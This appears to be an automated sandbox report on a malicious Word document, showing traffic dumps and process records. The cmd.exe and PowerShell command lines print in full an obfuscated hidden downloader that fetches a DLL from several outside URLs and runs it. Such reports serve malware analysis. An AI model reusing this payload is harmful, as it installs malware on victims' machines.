                                        Data Ascii: 5Ap}|Z?C5>=.(62%f-8%v6dSU%a^/+HA:qh9^-+x%@'8U(HX2tY&P'$1&X`.`g}C gKE]Z7SY?S`rdU0= aoCAq4s:)
                                        Jan 7, 2021 18:36:34.905683994 CET221OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                        Data Ascii:
                                        Jan 7, 2021 18:36:35.483923912 CET222INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Thu, 07 Jan 2021 17:36:36 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        Vary: Accept-Encoding
                                        Data Raw: 35 34 34 0d 0a 80 17 30 56 8f 83 4c 63 c4 73 3c 8d 81 bf d6 fa 08 45 90 0f b8 d6 42 2e 22 b4 59 63 4f 85 39 7c f7 2e 47 cb 38 91 50 df 61 4a 5c 2a 25 c8 0e df 5a 6a 13 b5 fb 79 82 e6 0c 9f 3c ba 12 0d f7 3b 0b 16 95 fe df a9 ed 65 6a 9f 04 d9 89 db 51 2b 36 8b 0e 96 8b 3f c5 12 32 6f 78 d4 76 1c 28 50 9a db 43 ee cb 38 d4 7c 0e 70 1e fc 23 73 28 67 90 17 4d 9a e3 6c 72 0f 84 d6 0b 65 c9 20 b8 95 ab 6c cf 47 3b de c9 f2 96 82 0c e9 32 f3 d5 5a 51 85 51 bb 17 5f bc 83 09 88 4d 2b 38 55 5a 5f 0a ad 3a e9 1e 22 c3 ed af b3 dd d8 71 ee 9c ab 77 46 88 be cd e0 d8 2d 57 12 0b 93 b1 e2 33 c4 e4 58 20 2f 6b 5a b4 a1 98 0b 88 db c7 7f 6c 42 37 6e 12 f8 8b d1 ab 6f 5e 60 21 f1 66 df f8 9f ba 40 34 6d 8c 55 1b b9 e1 b2 7e 2d 3b 1b 63 3d 13 e9 32 82 95 57 8e 02 80 61 a5 13 d0 8f 73 cf 3b b0 8a 89 e9 df 36 cb d0 a6 3f 24 c4 89 14 99 07 f6 52 d6 23 22 21 cb e7 0f 81 3b fc 36 a4 47 f6 dc 24 00 b1 d6 8d 16 af a1 cf b0 40 23 61 7f be b7 4a fd c5 96 63 7b a0 83 b5 cd ff 4f fc 86 f7 db ce 4d 16 a0 af e1 f9 34 24 f0 93 ec 5a a9 1f 90 a1 5f b5 da 84 6d 13 ca 56 ae 1a 4a b1 7b eb 05 37 e9 09 88 e9 7b e3 fe ce 21 eb 4a 7e fe 53 27 a3 0b 8c 57 4e 2c 17 50 c6 a0 eb 59 53 55 89 ed 6d 24 c2 d8 21 92 aa 02 94 b2 60 82 ff aa fb 3f 95 cc b2 48 2d 38 83 b2 74 08 10 0e 58 a4 b2 13 3d bb 97 72 b1 a4 0c 69 e7 6d 16 23 82 26 2c b2 c1 9f 85 49 98 71 9e 49 f4 91 95 3d f7 2f 23 47 f8 34 ad 84 2d 2a 4b 5b bb 47 39 06 20 f7 eb 31 24 97 3c 6e 4c c1 67 75 d6 2f 75 e1 6a 2b 5f 15 4b c2 72 b3 42 2d a9 48 86 7c 83 34 e9 4c 6f c9 ba d9 51 49 d7 08 60 e4 fb 72 15 c5 b3 9f c3 a4 cc 81 50 a1 8b 52 55 70 14 f6 e6 4b 29 da 17 d1 bc f3 5d f6 b5 e2 3f 6e 81 c4 ec 7d a7 ce 10 63 c7 4a c6 10 f8 a5 7e c9 dc ae a3 33 96 42 19 2e de 10 40 2a ed 60 b9 1c 2c c3 1c 19 45 50 f7 a7 f9 cc 43 eb 90 4f 29 ee cd f6 f3 28 71 fa fe b9 02 fe eb 68 75 ab b7 d1 cd ea 5f e3 e0 54 8e ee fb fc f6 d3 32 3b 9d 64 a2 f7 41 64 c9 c3 d1 be 6c 54 aa e3 de e7 09 8c 2e ea e3 d7 ea 2e 04 d4 2b 06 cb cd a0 32 f1 82 54 56 2d 2c 1c 6f 51 1a c5 e9 d1 63 04 c2 42 45 8c ab ee 16 01 1a 1e 69 70 43 21 7b bb 25 93 2b f8 b9 4c bc 69 f1 a4 50 95 e7 63 48 fb cd 01 4b f3 6b 86 d4 a1 f1 a2 94 43 2e d0 7e f6 9e da 69 e1 ea 64 97 8c 4d 0d c3 d9 96 b5 d3 b7 94 4a 12 c2 6c 53 d8 3b 7c b3 df e8 8b db 4c 18 9e 7f aa a5 93 6e 48 64 26 01 0e b9 fe 0f a3 66 c6 ce 04 c5 bd 27 f2 ae b7 b9 a0 06 eb 95 37 a9 71 f8 c4 9f b1 14 00 88 d3 1a 21 b8 43 02 6b 60 8d bd 55 45 fd 05 a4 7e 48 93 c2 f2 00 e6 d6 48 32 e5 70 ed 0f bc 88 7b f6 9b 8d c6 e0 c9 bb 72 3e fa 7d ee f8 a8 b6 f9 c0 ed 38 c2 b9 6b 8d 4c 64 da 19 99 42 26 8c a4 fc 5b 7a 4b fc ef f1 a7 f3 eb 63 9b dd 1e 28 a7 00 6a f7 b7 ac 44 4f e6 a4 85 32 86 91 06 f1 4c 85 7e 70 d6 3d 38 c3 23 9b 66 a4 e1 ac 3a ed 08 1a 5d 0e 6a 37 0a 0d 8e 38 4c fd 7c dc 03 84 71 95 dd cf da b9 d7 c1 ba 5e d3 3f 3f 62 cd 5a 75 72 c6 a0 af 03 a2 44 a6 a3 fb f3 e1 37 4b 0d 5c e8 7f 70 e1 85 49 44 ea 98 f3 8e 9b 04 b8 88 9c 8d a0 c1 55 17 27 90 13 34 1c 6a cc 79 ee 4c dd fb 9a 37 30 b0 ae d5 a2 e7 9b a4 76 eb d3 87 85 d0 e6 57 6e fa 6d 11 18 cc 20 d7 6c 14 31 57 7d 55 a0 9f 2b 00 3e eb 90 bb f6 a8 40 a7 ff 42 8a 08 23 0f 89 4c 76 63 b8 bb 86 fa d2 65 e4 e5 ff f1 fe 44 14 f1 fb b4 5f b1 61 90 45 90 39 41 34 d5 68 aa a0 e8 37 27 c9 10 b8 95 87 bf 51 58 27 16 38 2a 4a 16 bd 36 65 11 ae 7b 18 9e 88 22 7f e1 6e a3 d4 4c 77 9d b9 94 3f d1 f4 ea 4e 8f 8f 7b 55 fb 88 2f 4a 57 83 8e d0 63 eb 2d e0 eb 11 dc 4c c2 35 40 e2 df 34 56 a7 a4 4d bc 1d 98 ce 00 fd 74 18 c8 fd 94 4b d7 5e b8 7a
                                        Data Ascii: 5440VLcs<EB."YcO9|.G8PaJ\*%Zjy<;ejQ+6?2oxv(PC8|p#s(gMlre lG;2ZQQ_M+8UZ_:"qwF-W3X /kZlB7no^`!f@4mU~-;c=2Was;6?$R#"!;6G$@#aJc{OM4$Z_mVJ{7{!J~S'WN,PYSUm$!`?H-8tX=rim#&,IqI=/#G4-*K[G9 1$<nLgu/uj+_KrB-H|4LoQI`rPRUpK)]?n}cJ~3B.@*`,EPCO)(qhu_T2;dAdlT..+2TV-,oQcBEipC!{%+LiPcHKkC.~idMJlS;|LnHd&f'7q!Ck`UE~HH2p{r>}8kLdB&[zKc(jDO2L~p=8#f:]j78L|q^??bZurD7K\pIDU'4jyL70vWnm l1W}U+>@B#LvceD_aE9A4h7'QX'8*J6e{"nLw?N{U/JWc-L5@4VMtK^z
                                        Jan 7, 2021 18:36:35.484641075 CET222INData Raw: 49 fb d2 29 6d f7 19 e0 e5 99 43 4f 4e 37 51 1b 21 62 a2 98 87 99 64 3e cb 97 38 9b 0d 0d 0a 43 e6 53 c8 ba 69 0b 37 99 c8 7f 12 f2 84 a5 9c a6 9b f9 b6 3d eb 92 d3 01 e7 bc e1 3e c3 c3 50 31 3d 50 f9 27 d7 98 2d 03 19 43 01 80 76 2d 22 bd 5f c2
                                        Data Ascii: I)mCON7Q!bd>8CSi7=>P1=P'-Cv-"_7^qur?-X(cWP/^RxLtjcRwj"9P=l94<'':sJ\=D%~p40


                                        Code Manipulations

                                        Statistics

                                        CPU Usage

                                        Click to jump to process

                                        Memory Usage

                                        Click to jump to process

                                        High Level Behavior Distribution

                                        Click to dive into process behavior distribution

                                        Behavior

                                        Click to jump to process

                                        System Behavior

                                        Analysis Process: WINWORD.EXE PID: 2452 Parent PID: 584

                                        General

                                        Start time:18:35:36
                                        Start date:07/01/2021
                                        Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        Wow64 process (32bit):false
                                        Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                        Imagebase:0x13fdd0000
                                        File size:1424032 bytes
                                        MD5 hash:95C38D04597050285A18F66039EDB456
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Chronological Activities

                                        Analysis Process: cmd.exe PID: 1976 Parent PID: 1220

                                        General

                                        Start time:18:35:37
                                        Start date:07/01/2021
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IAAgAHMAZQBUAC0ASQB0AEUATQAgACAAdgBhAFIAaQBBAEIATABFADoAMAA5AFAAIAAgACgAWwBUAHkAUABFAF0AKAAiAHsAMAB9AHsAMwB9AHsAMgB9AHsAMQB9ACIALQBGACAAJwBTAHkAJwAsACcAYwB0AE8AcgBZACcALAAnAC4AaQBvAC4ARABJAHIARQAnACwAJwBzAHQAZQBNACcAKQApACAAIAA7ACAAIAAgAHMAZQBUAC0AaQB0AEUATQAgACgAJwBWACcAKwAnAEEAcgAnACsAJwBpAEEAYgBMAEUAOgBhAHYANQAnACsAJwBMACcAKwAnAG8AUgAnACkAIAAgACgAWwB0AFkAcABlAF0AKAAiAHsAMAB9AHsANwB9AHsAMQB9AHsAMwB9AHsANAB9AHsANgB9AHsANQB9AHsAMgB9ACIALQBmACAAJwBTAHkAUwAnACwAJwBlAG0ALgBOAGUAVAAuAFMAZQByAHYAJwAsACcAZQByACcALAAnAEkAJwAsACcAYwBlAHAAbwAnACwAJwB0AE0AYQBuAGEAZwAnACwAJwBJAG4AJwAsACcAVAAnACkAIAApACAAOwAgACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTACcAKwAnAGkAbABlAG4AJwApACsAKAAnAHQAbAB5AEMAJwArACcAbwBuAHQAJwApACsAJwBpACcAKwAoACcAbgAnACsAJwB1AGUAJwApACkAOwAkAEQAOAAxAHYAbAA2AGwAPQAkAFAAMQAyAFIAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAE8AOQA4AEUAOwAkAFIAXwAxAFoAPQAoACcASwAyACcAKwAnADYARQAnACkAOwAgACAAKABHAGMAaQAgAHYAQQByAEkAQQBCAEwAZQA6ADAAOQBwACAAKQAuAFYAQQBMAHUAZQA6ADoAIgBDAFIARQBhAGAAVABlAGAARABJAHIAYABlAGAAQwBUAE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAQgAnACsAKAAnAEcAJwArACcARgBMAHEAJwArACcAcAB3AF8ANQBpAEIAJwArACcARwAnACkAKwAoACcARgBGADQAdwAwACcAKwAnAG8AJwApACsAJwBzAGMAJwArACgAJwBCAEcAJwArACcARgAnACkAKQAgAC0AQwBSAGUAcABMAEEAYwBFACgAJwBCAEcAJwArACcARgAnACkALABbAGMASABhAHIAXQA5ADIAKQApADsAJABDADYAOQBWAD0AKAAnAFUAOQAnACsAJwA0AFYAJwApADsAIAAgACgAIABWAEEAcgBpAGEAYgBsAEUAIAAgACgAIgBBAHYANQAiACsAIgBMAG8AIgArACIAcgAiACkAIAAtAHYAQQBsAHUARQBvAG4AIAApADoAOgAiAHMAYABFAGMAVQBSAGkAYABUAHkAcABgAFIATwB0AGAATwBjAG8AbAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQATgA4ADAAVgA9ACgAJwBGADgAJwArACcAOABZACcAKQA7ACQAUgBnAGIAMABmAHEAcAAgAD0AIAAoACgAJwBSADkAJwArACcANQAnACkAKwAnAEYAJwApADsAJABIADIAMwBJAD0AKAAnAFYAJwArACgAJwAwACcAKwAnADQAUAAnACkAKQA7ACQARwBxAGwAdwA5AHQAZAA9ACQASABPAE0ARQArACgAKAAnAHsAMAB9AEwAcQAnACsAJwBwAHcAXwA1AGkAewAwAH0AJwArACcARgAnACsAJwA0AHcAJwArACcAMABvAHMAYwB7ADAAfQAnACkALQBmACAAIABbAEMAaABhAHIAXQA5ADIAKQArACQAUgBnAGIAMABmAHEAcAArACgAJwAuACcAKwAoACcAZAAnACsAJwBsAGwAJwApACkAOwAkAEQAMwA0AFMAPQAoACcAVgA1ACcAKwAnADkAVAAnACkAOwAkAEwAegA3ADQANgA4AHMAPQAoACgAJwBdAGEAJwArACcAbgAnACkAKwAoACcAdwBbADMAJwArACcAOgAnACkAKwAnAC8ALwAnACsAKAAnAGgAYQBuAGcAJwArACcAYQAnACkAKwAoACcAcgBsAGEAJwArACcAcwAnACkAKwAoACcAdABpAGsALgAnACsAJwBjACcAKQArACgAJwBvACcAKwAnAG0ALwAnACsAJwBjAGcAaQAnACkAKwAoACcALQBiAGkAJwArACcAbgAvACcAKwAnAFUAaQA0ACcAKQArACgAJwBuACcAKwAnAC8AQAAnACkAKwAnAF0AYQAnACsAKAAnAG4AdwBbADMAJwArACcAOgAnACsAJwAvAC8AJwApACsAKAAnAHAAJwArACcAYQBkAHIAJwArACcAZQBlAHMAYwAnACsAJwBhAHAAJwArACcAZQBzACcAKwAnAC4AYwBvAG0ALwBiACcAKwAnAGwAJwApACsAKAAnAG8AZwAvADAAJwArACcASQAvAEAAJwApACsAKAAnAF0AJwArACcAYQBuACcAKQArACcAdwBbACcAKwAoACcAMwA6ACcAKwAnAC8ALwBzACcAKQArACcAYQAnACsAJwByACcAKwAnAHQAJwArACcAdQByACcAKwAnAGUALgAnACsAKAAnAGMAJwArACcAbwBtAC8AdwBwACcAKQArACgAJwAtAGkAbgBjACcAKwAnAGwAJwArACcAdQAnACkAKwAoACcAZABlAHMAJwArACcALwBKAEQAOAAnACsAJwAvAEAAXQAnACkAKwAoACcAYQBuACcAKwAnAHcAJwApACsAKAAnAFsAMwA6ACcAKwAnAC8AJwApACsAJwAvAHMAJwArACcAZQAnACsAKAAnAG8AJwArACcALgB1AGQAJwApACsAKAAnAGEAaQBwACcAKwAnAHUAcgBrAGEAcgAnACsAJwB0AC4AYwAnACkAKwAnAG8AJwArACgAJwBtAC8AcgB4AC0AJwArACcANQAnACsAJwA3ADAAMAAnACkAKwAnAC0ANgAnACsAKAAnAGgAbgByADcALwBTACcAKwAnAGcAbQBzACcAKwAnAC8AQAAnACkAKwAoACcAXQBhAG4AdwAnACsAJwBbADMAJwArACcAOgAvACcAKQArACcALwBwACcAKwAnAGgAdQAnACsAKAAnAG8AbgAnACsAJwBnACcAKQArACcAYQBwACcAKwAoACcAcAAnACsAJwBsAGUAJwApACsAKAAnAC4AYwAnACsAJwBvAG0ALwAnACsAJwBtAGUAcwBzACcAKQArACcAZQAnACsAJwBuAGcAJwArACgAJwBlACcAKwAnAHIALQAnACkAKwAnAHMAbwAnACsAKAAnAHUAbgAnACsAJwBkACcAKQArACcALQA4ACcAKwAnAGsAdwAnACsAJwBrAHEAJwArACcALwBZACcAKwAoACcARgByADcALwBAACcAKwAnAF0AYQBuAHcAJwArACcAWwAnACkAKwAoACcAMwBzADoALwAvACcAKwAnAGIAJwApACsAKAAnAHIAJwArACcAZQB0ACcAKQArACcAdABzACcAKwAnAGgAYQAnACsAKAAnAHcAbQBhAGcAaQBjACcAKwAnAC4AYwBvAG0AJwArACcALwBjAG8AJwApACsAKAAnAG4AdABlACcAKwAnAG4AdAAnACkAKwAoACcALwBZAC8AJwArACcAQABdAGEAbgAnACkAKwAoACcAdwAnACsAJwBbADMAcwA6AC8ALwBjACcAKwAnAGEAJwArACcAZgBlAGMAZQBuACcAKwAnAHQAcgBhAGwALgB2AGkAJwApACsAKAAnAG4AYwBvAG8AcgBiAGkAJwArACcAcwAnACsAJwBkAGUAdgAuACcAKwAnAGMAJwApACsAKAAnAG8AbQAnACsAJwAvAHcAJwApACsAJwBwACcAKwAoACcALQBhAGQAbQAnACsAJwBpAG4ALwBWAFoAJwApACsAJwBYACcAKwAoACcAOQBCACcAKwAnAFUAJwApACsAJwAvACcAKQAuACIAUgBlAGAAUABMAEEAYABDAGUAIgAoACgAKAAnAF0AYQBuACcAKwAnAHcAJwApACsAJwBbADMAJwApACwAKABbAGEAcgByAGEAeQBdACgAJwBzAGQAJwAsACcAcwB3ACcAKQAsACgAJwBoAHQAJwArACcAdABwACcAKQAsACcAMwBkACcAKQBbADEAXQApAC4AIgBTAGAAUABsAGkAdAAiACgAJABCADEANABaACAAKwAgACQARAA4ADEAdgBsADYAbAAgACsAIAAkAFIANgA3AEgAKQA7ACQASgAxADcAUgA9ACgAKAAnAFEAJwArACcANgAxACcAKQArACcAUQAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEMAdgB5ADUANgA0AHQAIABpAG4AIAAkAEwAegA3ADQANgA4AHMAKQB7AHQAcgB5AHsAKAAmACgAJwBOAGUAJwArACcAdwAtAE8AYgBqAGUAJwArACcAYwB0ACcAKQAgAFMAeQBzAFQARQBNAC4ATgBFAHQALgB3AEUAYgBjAGwAaQBFAG4AVAApAC4AIgBkAGAATwBgAFcATgBMAE8AYQBEAEYAYABpAEwARQAiACgAJABDAHYAeQA1ADYANAB0ACwAIAAkAEcAcQBsAHcAOQB0AGQAKQA7ACQAUQA0ADMAQQA9ACgAJwBZACcAKwAoACcANQAnACsAJwBfAFcAJwApACkAOwBJAGYAIAAoACgALgAoACcARwAnACsAJwBlAHQALQBJAHQAZQAnACsAJwBtACcAKQAgACQARwBxAGwAdwA5AHQAZAApAC4AIgBsAGUATgBgAGcAdABoACIAIAAtAGcAZQAgADMAMAA5ADYAMQApACAAewAmACgAJwByAHUAbgBkAGwAJwArACcAbAAzADIAJwApACAAJABHAHEAbAB3ADkAdABkACwAKAAnAEMAJwArACgAJwBvACcAKwAnAG4AdAByAG8AbAAnACkAKwAnAF8AJwArACgAJwBSAHUAbgAnACsAJwBEAEwATAAnACkAKQAuACIAdABvAHMAYABUAFIAYABpAE4AZwAiACgAKQA7ACQAWQA4AF8AQwA9ACgAKAAnAFgAMwAnACsAJwAxACcAKQArACcATgAnACkAOwBiAHIAZQBhAGsAOwAkAEgAMQA5AEwAPQAoACcAUgA3ACcAKwAnADEATAAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEsAMgAyAFEAPQAoACcAVQAnACsAKAAnADMAJwArACcAMgBJACcAKQApAA==
                                        Imagebase:0x4a1b0000
                                        File size:345088 bytes
                                        MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate

                                        Chronological Activities

                                        Analysis Process: msg.exe PID: 2624 Parent PID: 1976

                                        General

                                        Start time:18:35:38
                                        Start date:07/01/2021
                                        Path:C:\Windows\System32\msg.exe
                                        Wow64 process (32bit):false
                                        Commandline:msg user /v Word experienced an error trying to open the file.
                                        Imagebase:0xff950000
                                        File size:26112 bytes
                                        MD5 hash:2214979661E779C3E3C33D4F14E6F3AC
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate

                                        Chronological Activities

                                        Analysis Process: powershell.exe PID: 2544 Parent PID: 1976

                                        General

                                        Start time:18:35:38
                                        Start date:07/01/2021
                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):false
                                        Commandline:POwersheLL -w hidden -ENCOD IAAgAHMAZQBUAC0ASQB0AEUATQAgACAAdgBhAFIAaQBBAEIATABFADoAMAA5AFAAIAAgACgAWwBUAHkAUABFAF0AKAAiAHsAMAB9AHsAMwB9AHsAMgB9AHsAMQB9ACIALQBGACAAJwBTAHkAJwAsACcAYwB0AE8AcgBZACcALAAnAC4AaQBvAC4ARABJAHIARQAnACwAJwBzAHQAZQBNACcAKQApACAAIAA7ACAAIAAgAHMAZQBUAC0AaQB0AEUATQAgACgAJwBWACcAKwAnAEEAcgAnACsAJwBpAEEAYgBMAEUAOgBhAHYANQAnACsAJwBMACcAKwAnAG8AUgAnACkAIAAgACgAWwB0AFkAcABlAF0AKAAiAHsAMAB9AHsANwB9AHsAMQB9AHsAMwB9AHsANAB9AHsANgB9AHsANQB9AHsAMgB9ACIALQBmACAAJwBTAHkAUwAnACwAJwBlAG0ALgBOAGUAVAAuAFMAZQByAHYAJwAsACcAZQByACcALAAnAEkAJwAsACcAYwBlAHAAbwAnACwAJwB0AE0AYQBuAGEAZwAnACwAJwBJAG4AJwAsACcAVAAnACkAIAApACAAOwAgACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTACcAKwAnAGkAbABlAG4AJwApACsAKAAnAHQAbAB5AEMAJwArACcAbwBuAHQAJwApACsAJwBpACcAKwAoACcAbgAnACsAJwB1AGUAJwApACkAOwAkAEQAOAAxAHYAbAA2AGwAPQAkAFAAMQAyAFIAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAE8AOQA4AEUAOwAkAFIAXwAxAFoAPQAoACcASwAyACcAKwAnADYARQAnACkAOwAgACAAKABHAGMAaQAgAHYAQQByAEkAQQBCAEwAZQA6ADAAOQBwACAAKQAuAFYAQQBMAHUAZQA6ADoAIgBDAFIARQBhAGAAVABlAGAARABJAHIAYABlAGAAQwBUAE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAQgAnACsAKAAnAEcAJwArACcARgBMAHEAJwArACcAcAB3AF8ANQBpAEIAJwArACcARwAnACkAKwAoACcARgBGADQAdwAwACcAKwAnAG8AJwApACsAJwBzAGMAJwArACgAJwBCAEcAJwArACcARgAnACkAKQAgAC0AQwBSAGUAcABMAEEAYwBFACgAJwBCAEcAJwArACcARgAnACkALABbAGMASABhAHIAXQA5ADIAKQApADsAJABDADYAOQBWAD0AKAAnAFUAOQAnACsAJwA0AFYAJwApADsAIAAgACgAIABWAEEAcgBpAGEAYgBsAEUAIAAgACgAIgBBAHYANQAiACsAIgBMAG8AIgArACIAcgAiACkAIAAtAHYAQQBsAHUARQBvAG4AIAApADoAOgAiAHMAYABFAGMAVQBSAGkAYABUAHkAcABgAFIATwB0AGAATwBjAG8AbAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQATgA4ADAAVgA9ACgAJwBGADgAJwArACcAOABZACcAKQA7ACQAUgBnAGIAMABmAHEAcAAgAD0AIAAoACgAJwBSADkAJwArACcANQAnACkAKwAnAEYAJwApADsAJABIADIAMwBJAD0AKAAnAFYAJwArACgAJwAwACcAKwAnADQAUAAnACkAKQA7ACQARwBxAGwAdwA5AHQAZAA9ACQASABPAE0ARQArACgAKAAnAHsAMAB9AEwAcQAnACsAJwBwAHcAXwA1AGkAewAwAH0AJwArACcARgAnACsAJwA0AHcAJwArACcAMABvAHMAYwB7ADAAfQAnACkALQBmACAAIABbAEMAaABhAHIAXQA5ADIAKQArACQAUgBnAGIAMABmAHEAcAArACgAJwAuACcAKwAoACcAZAAnACsAJwBsAGwAJwApACkAOwAkAEQAMwA0AFMAPQAoACcAVgA1ACcAKwAnADkAVAAnACkAOwAkAEwAegA3ADQANgA4AHMAPQAoACgAJwBdAGEAJwArACcAbgAnACkAKwAoACcAdwBbADMAJwArACcAOgAnACkAKwAnAC8ALwAnACsAKAAnAGgAYQBuAGcAJwArACcAYQAnACkAKwAoACcAcgBsAGEAJwArACcAcwAnACkAKwAoACcAdABpAGsALgAnACsAJwBjACcAKQArACgAJwBvACcAKwAnAG0ALwAnACsAJwBjAGcAaQAnACkAKwAoACcALQBiAGkAJwArACcAbgAvACcAKwAnAFUAaQA0ACcAKQArACgAJwBuACcAKwAnAC8AQAAnACkAKwAnAF0AYQAnACsAKAAnAG4AdwBbADMAJwArACcAOgAnACsAJwAvAC8AJwApACsAKAAnAHAAJwArACcAYQBkAHIAJwArACcAZQBlAHMAYwAnACsAJwBhAHAAJwArACcAZQBzACcAKwAnAC4AYwBvAG0ALwBiACcAKwAnAGwAJwApACsAKAAnAG8AZwAvADAAJwArACcASQAvAEAAJwApACsAKAAnAF0AJwArACcAYQBuACcAKQArACcAdwBbACcAKwAoACcAMwA6ACcAKwAnAC8ALwBzACcAKQArACcAYQAnACsAJwByACcAKwAnAHQAJwArACcAdQByACcAKwAnAGUALgAnACsAKAAnAGMAJwArACcAbwBtAC8AdwBwACcAKQArACgAJwAtAGkAbgBjACcAKwAnAGwAJwArACcAdQAnACkAKwAoACcAZABlAHMAJwArACcALwBKAEQAOAAnACsAJwAvAEAAXQAnACkAKwAoACcAYQBuACcAKwAnAHcAJwApACsAKAAnAFsAMwA6ACcAKwAnAC8AJwApACsAJwAvAHMAJwArACcAZQAnACsAKAAnAG8AJwArACcALgB1AGQAJwApACsAKAAnAGEAaQBwACcAKwAnAHUAcgBrAGEAcgAnACsAJwB0AC4AYwAnACkAKwAnAG8AJwArACgAJwBtAC8AcgB4AC0AJwArACcANQAnACsAJwA3ADAAMAAnACkAKwAnAC0ANgAnACsAKAAnAGgAbgByADcALwBTACcAKwAnAGcAbQBzACcAKwAnAC8AQAAnACkAKwAoACcAXQBhAG4AdwAnACsAJwBbADMAJwArACcAOgAvACcAKQArACcALwBwACcAKwAnAGgAdQAnACsAKAAnAG8AbgAnACsAJwBnACcAKQArACcAYQBwACcAKwAoACcAcAAnACsAJwBsAGUAJwApACsAKAAnAC4AYwAnACsAJwBvAG0ALwAnACsAJwBtAGUAcwBzACcAKQArACcAZQAnACsAJwBuAGcAJwArACgAJwBlACcAKwAnAHIALQAnACkAKwAnAHMAbwAnACsAKAAnAHUAbgAnACsAJwBkACcAKQArACcALQA4ACcAKwAnAGsAdwAnACsAJwBrAHEAJwArACcALwBZACcAKwAoACcARgByADcALwBAACcAKwAnAF0AYQBuAHcAJwArACcAWwAnACkAKwAoACcAMwBzADoALwAvACcAKwAnAGIAJwApACsAKAAnAHIAJwArACcAZQB0ACcAKQArACcAdABzACcAKwAnAGgAYQAnACsAKAAnAHcAbQBhAGcAaQBjACcAKwAnAC4AYwBvAG0AJwArACcALwBjAG8AJwApACsAKAAnAG4AdABlACcAKwAnAG4AdAAnACkAKwAoACcALwBZAC8AJwArACcAQABdAGEAbgAnACkAKwAoACcAdwAnACsAJwBbADMAcwA6AC8ALwBjACcAKwAnAGEAJwArACcAZgBlAGMAZQBuACcAKwAnAHQAcgBhAGwALgB2AGkAJwApACsAKAAnAG4AYwBvAG8AcgBiAGkAJwArACcAcwAnACsAJwBkAGUAdgAuACcAKwAnAGMAJwApACsAKAAnAG8AbQAnACsAJwAvAHcAJwApACsAJwBwACcAKwAoACcALQBhAGQAbQAnACsAJwBpAG4ALwBWAFoAJwApACsAJwBYACcAKwAoACcAOQBCACcAKwAnAFUAJwApACsAJwAvACcAKQAuACIAUgBlAGAAUABMAEEAYABDAGUAIgAoACgAKAAnAF0AYQBuACcAKwAnAHcAJwApACsAJwBbADMAJwApACwAKABbAGEAcgByAGEAeQBdACgAJwBzAGQAJwAsACcAcwB3ACcAKQAsACgAJwBoAHQAJwArACcAdABwACcAKQAsACcAMwBkACcAKQBbADEAXQApAC4AIgBTAGAAUABsAGkAdAAiACgAJABCADEANABaACAAKwAgACQARAA4ADEAdgBsADYAbAAgACsAIAAkAFIANgA3AEgAKQA7ACQASgAxADcAUgA9ACgAKAAnAFEAJwArACcANgAxACcAKQArACcAUQAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEMAdgB5ADUANgA0AHQAIABpAG4AIAAkAEwAegA3ADQANgA4AHMAKQB7AHQAcgB5AHsAKAAmACgAJwBOAGUAJwArACcAdwAtAE8AYgBqAGUAJwArACcAYwB0ACcAKQAgAFMAeQBzAFQARQBNAC4ATgBFAHQALgB3AEUAYgBjAGwAaQBFAG4AVAApAC4AIgBkAGAATwBgAFcATgBMAE8AYQBEAEYAYABpAEwARQAiACgAJABDAHYAeQA1ADYANAB0ACwAIAAkAEcAcQBsAHcAOQB0AGQAKQA7ACQAUQA0ADMAQQA9ACgAJwBZACcAKwAoACcANQAnACsAJwBfAFcAJwApACkAOwBJAGYAIAAoACgALgAoACcARwAnACsAJwBlAHQALQBJAHQAZQAnACsAJwBtACcAKQAgACQARwBxAGwAdwA5AHQAZAApAC4AIgBsAGUATgBgAGcAdABoACIAIAAtAGcAZQAgADMAMAA5ADYAMQApACAAewAmACgAJwByAHUAbgBkAGwAJwArACcAbAAzADIAJwApACAAJABHAHEAbAB3ADkAdABkACwAKAAnAEMAJwArACgAJwBvACcAKwAnAG4AdAByAG8AbAAnACkAKwAnAF8AJwArACgAJwBSAHUAbgAnACsAJwBEAEwATAAnACkAKQAuACIAdABvAHMAYABUAFIAYABpAE4AZwAiACgAKQA7ACQAWQA4AF8AQwA9ACgAKAAnAFgAMwAnACsAJwAxACcAKQArACcATgAnACkAOwBiAHIAZQBhAGsAOwAkAEgAMQA5AEwAPQAoACcAUgA3ACcAKwAnADEATAAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEsAMgAyAFEAPQAoACcAVQAnACsAKAAnADMAJwArACcAM